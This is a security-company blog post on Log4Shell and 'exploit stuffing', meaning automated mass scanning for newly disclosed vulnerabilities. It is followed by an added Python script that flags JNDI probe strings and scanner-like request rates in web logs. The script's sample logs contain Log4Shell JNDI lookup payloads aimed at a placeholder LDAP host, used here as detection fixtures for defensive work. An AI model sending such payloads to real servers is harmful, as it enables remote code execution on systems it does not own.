Exploit Stuffing, Log4Shell, and Automation

Researchers: Ryan Castellucci, Elif Kaya, Michael McNally, H Sandford, Adam Sell, Joe Tallett

In this post:

  • Why NIST rated the Log4Shell vulnerability in Apache’s Log4j a 10/10 in severity.
  • The growing trend—and potential impacts—of exploit stuffing.
  • The role automation plays in exploit stuffing and in Log4j-related attacks.

When a new exploit—a mechanism for breaking software or hardware and forcing it to do something unintended or unexpected—is discovered, the National Institute of Standards and Technology (NIST) reviews the way the exploit works, how widely it could spread, and how much damage it could cause. With all of that information, NIST assigns the exploit a score on a scale of zero to ten, with ten being “critical”.

A ten on the NIST scale for vulnerabilities suggests that the exploit is genuinely dangerous: there’s a real potential for abuse, and the impacts of that abuse could be significant. And tens on the NIST scale aren’t given out arbitrarily; they’re identified using an equation incorporating a number of variables, including how easily the vulnerability might be exploited, whether the vulnerability requires certain permissions on the target system, how complex the process would be to complete, and other elements.

All of this is a prologue for the following: when Log4Shell—the hottest topic in cybersecurity for over a month now—was reviewed by NIST, it was ranked a 10/10. In fact, it has ranked highly on the scale multiple times, as the early patches put out to resolve the problem turned out not to cover all contingencies.

(To clarify a common misconception, Log4Shell is the common name for a series of vulnerabilities associated with the Log4j service.)

There’s a great deal of excellent coverage already in the world of what Log4Shell is and how it exploits Log4j, so we here at HUMAN wanted to take a different approach: rather than rehash what you may already know, we wanted to discuss it in the context of the growing use of automation in cyber attacks:

  • What is the role that bots can and will have with respect to Log4Shell?
  • How do exploits participate in the creation of new botnets?
  • What corners of the universe that HUMAN has visibility into could a vulnerability like Log4Shell impact?
  • What does HUMAN see as the future of exploits like Log4Shell?

The answers to these questions help underscore the threat that unchecked and unmitigated automation poses to cybersecurity and other industries.

What is the role that bots can and will have with respect to Log4Shell?

The very short answer to this question is: anything worth doing on the internet is worth doing many, many times over at scale. If a cybercriminal is able to take advantage of the Log4Shell exploit of Log4j to remotely execute code on a device, it will be worth it to them to scale that operation up and do it thousands or millions of times over across the internet, searching for new victims by testing an exploit against every site possible.

But, as you might imagine, doing it by hand thousands or millions of times over isn’t realistic or efficient. And here is where bots first come into the picture: cybercriminals can use bots to automate the process of discovering where the Log4Shell exploit might succeed.

Finding where an exploit might be applicable is the first step of what’s called the Cyber Kill Chain. Lockheed Martin developed the framework, which outlines the steps that cybercriminals take in carrying out an attack and is used in cybersecurity frameworks like MITRE’s ATT&CK. The first step in that framework is called “reconnaissance”, and describes the process of identifying a target, the best mechanism of attack, and the plan and timing for doing so. It can be one of the most time-consuming elements of a cybercriminal’s work, as one wrong move in this phase and the attack is stymied, or worse, the bad actor reveals enough to be caught.

Automating this process of victim-hunting speeds up the reconnaissance phase of the cyber kill chain dramatically. And the shorter that phase of the process, the more victims a cybercriminal can attack. It becomes a tactic in and of itself, using bots to find potential victims of newly-discovered vulnerabilities.

This tactic, which we call exploit stuffing (named for its loose similarity to credential stuffing, a tactic by which cybercriminals attempt to break into user accounts using a set of leaked or stolen credentials), is not unprecedented. Over the past three years, HUMAN has observed an increase in exploit stuffing where bad actors are moving directly to the exploitation phase for common services such as Microsoft Exchange, Citrix Pulse Secure VPN, F5 BIG-IP VPN, and Atlassian Confluence.

In each of these instances, the vulnerabilities within the tools were exploited rapidly and widely. Many of the attacks come from malware which already has a ready-to-go group of scanners and infection-capable devices (often available because of other, existing bot networks), which can be updated remotely to include new exploit capabilities.

How do exploits participate in the creation of new botnets?

Here’s part two of the bot problem as it pertains to Log4Shell and other exploits. The nature of the Log4j-targeted exploit means an attacker can execute code on the targeted system. It’s called remote (or arbitrary) code execution, and it’s one of the most insidious attacks that can happen. Other vulnerabilities in other apps may allow attackers to remotely execute code on personal devices, including desktops, mobile devices, IoT devices, or CTV (connected TV).

It’s not always, however, in a cybercriminal’s best interest to go ahead and carry out a full-fledged, lock-you-out-of-everything attack on your computer in this way. Doing so lets you know that something is very wrong, and that limits the amount of time that a cybercriminal can take advantage of the exploit. So instead, they execute code that allows them to take control of part of your computer, often a part that you can’t even see. They might operate in the background, stealing the resources that your computer has available to it. Or they might simply hunt for data available on your computer to resell later.

One common example of how a cybercriminal can use your computer against you is through cryptomining. The code they execute deposits a small, invisible app on your computer that will—totally in the background, mind you—compute complex mathematical equations with the goal of creating (“mining”) cryptocurrencies. Indeed, many of the botnets associated with early exploitation of Log4Shell are doing so to create cryptomining networks.

What we here at HUMAN are on the lookout for, however, is another possible result of exploit stuffing: new botnets. If, instead of depositing malware for cryptomining, the cybercriminal dropped off a Trojan set up to run commands at some point in the future, then we’re off to the races. Not to mention that getting in the door is just step one for an attacker. Attackers often pivot their goals and tactics once the foothold is established. Cryptomining might be the most lucrative payload today, but tomorrow, it might be one or another flavor of ad fraud.

Consider that in many of the investigations centered on ad fraud published by the Satori Threat Intelligence and Research Team, the culprit is code hidden within an app and covering the tracks of fraudulent activity taking place in the background. Exploit stuffing—especially with exploits that enable remote code execution—makes it even easier for the cybercriminals, as they don’t need to rely on social engineering to get a fraudulent app onto the device. The apps with vulnerabilities may be core to your work or personal life, or be pre-installed on your device.

Which is to say, diligence about password hygiene and software downloads may not be enough to protect you from an exploit stuffing attack. For example, the Log4j vulnerability existed for years before it was identified and disclosed in late 2021.

What corners of the universe that HUMAN has visibility into could a vulnerability like Log4Shell impact?

Realistically, it’s all of them. The nature of this vulnerability means there’s no corner of the internet that’s not worth it for a cybercriminal to pursue. The code deposited and executed by an exploit like Log4Shell can feasibly carry out fraudulent activity or traffic in myriad realms. And that’s a big part of why it ranked a 10/10 on the NIST scale: the Log4Shell vulnerability gives cybercriminals a roadmap to getting into a system, but doesn’t put guardrails on what they can do once they’re there.

Exploits worth a cybercriminal’s time for an exploit stuffing attack often, as noted above, center on apps that are critical to doing business. Revisit the list above: Microsoft Exchange, Atlassian Confluence, various VPNs. These are important elements for a distributed, modern workforce. Vulnerabilities within these crucial applications could—and do—have far-reaching effects.

But it’s not limited to business apps. The notoriety of Log4Shell should raise the alarm, too, for our friends in the advertising technology ecosystem. Often, a cybercriminal’s first entry point into an environment isn’t the system they want to end up controlling. So they’ll get in via whatever door is open to them, and once inside, use the rest of their cybercriminal tool kit to gain greater privileges and move to other systems. It’s called lateral movement in the cybersecurity world, and it’s where a key threat to the advertising technology ecosystem lies.

After all, it’s not very many jumps within an advertising ecosystem to get from a system vulnerable to an exploit stuffing attack to a system with a treasure trove of personal and sensitive information. In fact, the Federal Trade Commission is warning businesses that they have to respond to the Log4Shell vulnerability or face potential legal action. 

What does HUMAN see as the future of exploits like Log4Shell?

Buckle up, because exploit stuffing as an attack mechanism isn’t going anywhere. What Log4Shell has demonstrated is that the right vulnerability can be incredibly attractive to cybercriminals looking to expand their repertoire. And while not every vulnerability will have the potential reach and damage of Log4Shell, the possibility of a cybercriminal automating the reconnaissance process to get inside a system and then automating lateral movement in search of paydirt is noteworthy.

Exploit stuffing is and will remain a major cybersecurity threat for 2022 and beyond. It’s unfortunate that it took a vulnerability the severity of Log4Shell to help raise it to the public cyber-zeitgeist, but if there’s a silver lining to be found, it’s that the increased awareness will spur organizations to find ways to prevent the impacts of exploit stuffing.

Exacerbating the problem is that the majority of the exploit stuffing attacks associated with Log4Shell are fairly rudimentary, not tailored to a target or making a substantial effort to customize parameters to avoid detection. The next wave of attacks centering on Log4Shell—and indeed, on other exploits—will almost certainly be more sophisticated and targeted in nature, making prevention that much harder.

And while automation is not a part of the exploits themselves, it is a key part of how a cybercriminal can scale up an operation predicated on these exploits. Identifying automation is, consequently, a critical element in curbing the impacts of exploit stuffing.
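Two threads of the post come together when a defender reviews web-server logs: the reconnaissance-at-scale behaviour described under the first question, and the closing point that identifying automation is what curbs exploit stuffing. The Python below is an added example, not code from HUMAN or from this post. It runs over a handful of constructed access-log lines (not real traffic: the addresses are from documentation ranges and `probe.example` is a placeholder host) and flags two things: request fields carrying the `${jndi:` lookup prefix that Log4Shell advisories tell administrators to search their logs for, and sources that hit many distinct paths within a few seconds, which is the fingerprint of the rudimentary, untailored scanning the post says dominated the first wave. The thresholds, field list and function names are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
# 203.0.113.10 plays a hypothetical scanner; 198.51.100.7 plays a hypothetical human visitor.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example/a}"
203.0.113.10 - - [10/Dec/2021:14:02:01 +0000] "GET /login HTTP/1.1" 404 12 "-" "${jndi:ldap://probe.example/a}"
203.0.113.10 - - [10/Dec/2021:14:02:02 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "${jndi:ldap://probe.example/a}"
203.0.113.10 - - [10/Dec/2021:14:02:02 +0000] "GET /admin HTTP/1.1" 403 0 "-" "${jndi:ldap://probe.example/a}"
203.0.113.10 - - [10/Dec/2021:14:02:03 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fprobe.example%2Fa%7D HTTP/1.1" 404 12 "-" "curl/7.79.1"
198.51.100.7 - - [10/Dec/2021:14:02:05 +0000] "GET /blog HTTP/1.1" 200 8123 "https://example.org/" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:14:03:40 +0000] "GET /blog/post-1 HTTP/1.1" 200 9001 "https://example.org/blog" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "method path protocol" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The lookup prefix Log4j expands. Matching after percent-decoding catches URL-encoded copies.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def parse_line(line: str):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def jndi_fields(rec: dict) -> list:
    """Names of the request fields carrying the lookup prefix (checked after percent-decoding)."""
    return [f for f in ("path", "referer", "ua") if JNDI_RE.search(unquote(rec[f]))]


def analyze(log_text: str, min_paths: int = 4, window_seconds: int = 10) -> dict:
    """Return per-source JNDI probe hits and the sources whose request pattern looks automated."""
    records = [r for r in (parse_line(ln) for ln in log_text.splitlines()) if r]
    probes = defaultdict(list)   # ip -> [(path, field carrying the lookup string), ...]
    by_ip = defaultdict(list)    # ip -> every parsed record from that source
    for rec in records:
        by_ip[rec["ip"]].append(rec)
        for field in jndi_fields(rec):
            probes[rec["ip"]].append((rec["path"], field))

    # Automation heuristic: one source touching many distinct paths inside a short window.
    # A person clicking through a site rarely does that; a scanner walking a wordlist does.
    scanners = set()
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        for i, first in enumerate(recs):
            window = [r for r in recs[i:]
                      if (r["time"] - first["time"]).total_seconds() <= window_seconds]
            if len({r["path"] for r in window}) >= min_paths:
                scanners.add(ip)
                break
    return {"probes": dict(probes), "scanners": scanners}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, hits in result["probes"].items():
        print(f"{ip}: {len(hits)} request(s) carrying a JNDI lookup string")
        for path, field in hits:
            print(f"    {path}  (in {field})")
    print("sources that look like automated scanners:", sorted(result["scanners"]))
```

Two design points matter here. Decoding before matching is what catches the fifth sample line, where the lookup string arrives percent-encoded in the path rather than in a header; a signature that only looks at raw bytes misses it. And the automation heuristic is deliberately coarse, keyed to the untailored first-wave behaviour the post describes: a scanner that sprays the same payload across many paths in seconds stands out on request rate alone, whereas the more targeted attacks the post anticipates next would need behavioural signals that this rate check cannot supply.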